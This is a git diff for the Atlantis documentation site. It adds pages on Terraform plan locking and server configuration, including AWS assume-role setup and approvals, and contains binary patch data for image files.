zyo#N5KvJN<xNuJ6s+F6Xna)koJa<LY<`EMx9M`Fn5{`2e8~yG7hS>dlGC6{cLtU7q
zf3yCCY170`?<)NF^ZD^*ewM#=Ez0{(0G+pvmjvellfxG$#$#u#%P(?1crj=Gc5~T_
zixU`;x3|Ia0jk&naV`U3I_~x(AsqwL$KHSjVE&6OAtC<(?S0V-3bA*Kgh@zw3JnhW
zA_;f)6pPPg=sWkbvih>1EteQ}&!8lWs)Y=|gt_|#DG8H9;Q}|Sg!%hBuIeNtJqL!y
zIE@3K6lFC4QC9!4JN|_H{~zv}8X6PqYJXL{jwDnRf|9_3<=k`ZYNJk_I`xD*{zp^I
z-`DZ)UoNk9JJ-+9r<YU<yuxAW#*KmdeqCLEYJp?(t`%XcP#cffW8lFZaf`}NOF&2R
zPntPX^LlLg-JSOz6mMt+#==F{m21{a0bT@A{^_WGUEsPMkGk|$P0hk?5K2@ESbS%_
zSNUA_=iB^xZSnY;jZdCFo%@^Djy>7~SRTht5mxs*(a6l6v~^<Z;_iTzY^X^b)hI~V
zJeVV1usPp?cdkX@A|5%LA9M0Q@4Vr_WU=eRsvVIQ=d9n`>;!sYrq@#L+?8BJ7<Wgw
zpvnAR)ob0KUoQKf+;{QhX=es^b;h@M?^itLwXFM7k+ao!?x_ulhoAiUe11AGmTtIK
z_F|Ud7-f&cc43R!Ut4NEom4OS^5Wu+Et=;zc_fWoj`d1ke|zp}OqKzoO!|YY9WyP?
zIb03tB*Mf4mZ}9GkBWQ8#oe>Ky6oKz2_}nk7ecKIAGH80;r34-kINqqI{N2hf4z;f
z`=Tg9r7kEm&&@j^zV8DosKR-2h+BV(pt9SE2M3$a-#b|SVIs$a7YD_s2cu5;;E3|Z
zcZ$IJ_4^LLEkcBY9B6UX1_nkM+aHgLvM{PzELE7o1zQ%NYvitXhACl_Mi+D77gK0h
z%pM=($4iuJb^))<mbv@b>Y^7hfhO?cAQMZ$mj~UaSE8=*#^Du*?*c&ARL7`C5fjP4
zrQ#6{41IDng_fqoxke7?nv(w4F4}@b6&~!|z*?_aUvGIE5lN1L=`Qf*jlOq<b2C&4
zwPL_I;7bCqiC6XE=+i4WQVME>EU4xHy2f^$@LCsac^zG>QBDV#%=q{1m?K4$YfAWm
zuGw|GbkS5Caf2EJ7n)f|6Fq7K!DC=F(c?}+qlq4ONi|y1<1VRaUef=m{~^+nH&Hc{
Qi2(>aUHx3vIVCg!00<w#yZ`_I

literal 0
HcmV?d00001

diff --git a/runatlantis.io/docs/locking.md b/runatlantis.io/docs/locking.md
new file mode 100644
index 0000000000..55615c76af
--- /dev/null
+++ b/runatlantis.io/docs/locking.md
@@ -0,0 +1,66 @@
+# Locking
+When `plan` is run, the directory and Terraform workspace are **Locked** until the pull request merged or the plan is manually deleted.
+
+If another user attempts to `plan` for the same directory and workspace in a different pull request
+they'll see this error:
+
+![Lock Comment](./images/lock-comment.png)
+
+Which links them to the pull request that holds the lock.
+
+::: warning NOTE
+Only the directory in the repo and Terraform workspace are locked, not the whole repo.
+:::
+
+[[toc]]
+
+## Why
+1. Because `atlantis apply` is being done before the pull request is merged, after
+an apply your `master` branch does not represent the most up to date version of your infrastructure
+anymore. With locking, you can ensure that no other changes will be made until the
+pull request is merged.
+
+::: tip Why not apply on merge?
+Sometimes `terraform apply` fails. If the apply were to fail after the pull
+request was merged, you would need to create a new pull request to fix it.
+With locking + applying on the branch, you effectively mimic merging to master
+but with the added ability to re-plan/apply multiple times if things don't work.
+:::
+2. If there is already a `plan` in progress, other users won't see a plan that
+will be made invalid after the in-progress plan is applied.
+
+## Viewing Locks
+To view locks, go to the URL that Atlantis is hosted at:
+
+![Locks View](./images/locks-ui.png)
+
+You can click on a lock to view its details:
+
+<p align="center">
+    <img src="./images/lock-detail-ui.png" alt="Lock Detail View" height="400px">
+</p>
+
+## Unlocking
+To unlock the project and workspace without completing an `apply` and merging, click the link
+at the bottom of the plan comment to discard the plan and delete the lock where
+it says **"To discard this plan click here"**:
+
+![Locks View](./images/lock-delete-comment.png)
+
+The link will take you to the lock detail view where you can click **Discard Plan and Unlock**
+to delete the lock.
+
+<p align="center">
+    <img src="./images/lock-detail-ui.png" alt="Lock Detail View" height="400px">
+</p>
+
+Once a plan is discarded, you'll need to run `plan` again prior to running `apply` when you go back to that pull request.
+
+## Relationship to Terraform State Locking
+Atlantis does not conflict with [Terraform State Locking](https://www.terraform.io/docs/state/locking.html). Under the hood, all
+Atlantis is doing is running `terraform plan` and `apply` and so all of the
+locking built in to those commands by Terraform isn't affected.
+
+In more detail, Terraform state locking locks the state while you run `terraform apply`
+so that multiple apply's can't run concurrently. Atlantis's locking is at a higher
+level because it prevents multiple pull requests from working on the same state.
diff --git a/runatlantis.io/docs/server-configuration.md b/runatlantis.io/docs/server-configuration.md
new file mode 100644
index 0000000000..e5c68ca016
--- /dev/null
+++ b/runatlantis.io/docs/server-configuration.md
@@ -0,0 +1,99 @@
+# Server Configuration
+This documentation explains how to configure the Atlantis server and how to deal
+with credentials.
+
+[[toc]]
+
+Configuration for `atlantis server` can be specified via command line flags, environment variables or a YAML config file.
+Config file values are overridden by environment variables which in turn are overridden by flags.
+
+## YAML
+To use a yaml config file, run atlantis with `--config /path/to/config.yaml`.
+The keys of your config file should be the same as the flag, ex.
+```yaml
+---
+gh-token: ...
+log-level: ...
+```
+
+## Environment Variables
+All flags can be specified as environment variables. You need to convert the flag's `-`'s to `_`'s, uppercase all the letters and prefix with `ATLANTIS_`.
+For example, `--gh-user` can be set via the environment variable `ATLANTIS_GH_USER`.
+
+To see a list of all flags and their descriptions run `atlantis server --help`
+
+::: warning
+The flag `--atlantis-url` is set by the environment variable `ATLANTIS_ATLANTIS_URL` **NOT** `ATLANTIS_URL`.
+:::
+
+## AWS Credentials
+Atlantis simply shells out to `terraform` so you don't need to do anything special with AWS credentials.
+As long as `terraform` commands works where you're hosting Atlantis, then Atlantis will work.
+See [https://www.terraform.io/docs/providers/aws/#authentication](https://www.terraform.io/docs/providers/aws/#authentication) for more detail.
+
+### Multiple AWS Accounts
+Atlantis supports multiple AWS accounts through the use of Terraform's
+[AWS Authentication](https://www.terraform.io/docs/providers/aws/#authentication).
+
+If you're using the [Shared Credentials file](https://www.terraform.io/docs/providers/aws/#shared-credentials-file)
+you'll need to ensure the server that Atlantis is executing on has the corresponding credentials file.
+
+If you're using [Assume role](https://www.terraform.io/docs/providers/aws/#assume-role)
+you'll need to ensure that the credentials file has a `default` profile that is able
+to assume all required roles.
+
+[Environment variables](https://www.terraform.io/docs/providers/aws/#environment-variables) authentication
+won't work for multiple accounts since Atlantis wouldn't know which environment variables to execute
+Terraform with.
+
+### Assume Role Session Names
+Atlantis injects the Terraform variable `atlantis_user` and sets it to the GitHub username of
+the user that is running the Atlantis command. This can be used to dynamically name the assume role
+session which would allow you to view the GitHub username associated with the AWS API calls
+being made during a `plan` or `apply` in CloudWatch.
+
+To take advantage of this feature, use Terraform's [built-in support](https://www.terraform.io/docs/providers/aws/#assume-role) for assume role
+and use the `atlantis_user` terraform variable
+
+```hcl
+provider "aws" {
+  assume_role {
+    role_arn     = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
+    session_name = "${var.atlantis_user}"
+  }
+}
+
+variable "atlantis_user" {
+  default = "atlantis_user"
+}
+```
+
+If you're also using the [S3 Backend](https://www.terraform.io/docs/backends/types/s3.html)
+make sure to add the `role_arn` option:
+
+```hcl
+terraform {
+  backend "s3" {
+    bucket   = "mybucket"
+    key      = "path/to/my/key"
+    region   = "us-east-1"
+    role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
+    # can't use var.atlantis_user as the session name because
+    # interpolations are not allowed in backend configuration
+    # session_name = "${var.atlantis_user}" WON'T WORK
+  }
+}
+```
+
+Terraform doesn't support interpolations in backend config so you will not be
+able to use `session_name = "${var.atlantis_user}"`. However, the backend assumed
+role is only used for state-related API actions. Any other API actions will be performed using
+the assumed role specified in the `aws` provider and will have the session named as the GitHub user.
+
+## Approvals
+If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply` simply run Atlantis with the `--require-approval` flag.
+By default, no approval is required.
+
+For more information on GitHub pull request reviews and approvals see: [https://help.github.com/articles/about-pull-request-reviews/](https://help.github.com/articles/about-pull-request-reviews/)
+
+For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: [https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html](https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html).
\ No newline at end of file
diff --git a/runatlantis.io/guide/README.md b/runatlantis.io/guide/README.md
index ac0ac2ef71..32c0f424c3 100644
--- a/runatlantis.io/guide/README.md
+++ b/runatlantis.io/guide/README.md
@@ -25,7 +25,6 @@ If you'd like to try out running Atlantis on an example repo check out the [Test
 ## Why would you run Atlantis?
 ### Increased visibility
 When everyone is executing Terraform on their own computers, it's hard to know the
-
 current state of your infrastructure:
 * Is what's in `master` deployed?
 * Did someone forget to create a pull request for that latest change?
diff --git a/runatlantis.io/guide/images/atlantis-logo.png b/runatlantis.io/guide/images/atlantis-logo.png
deleted file mode 100644
index 748e26771af638c3dea9a2c31626213b7e43bf38..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 14750
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
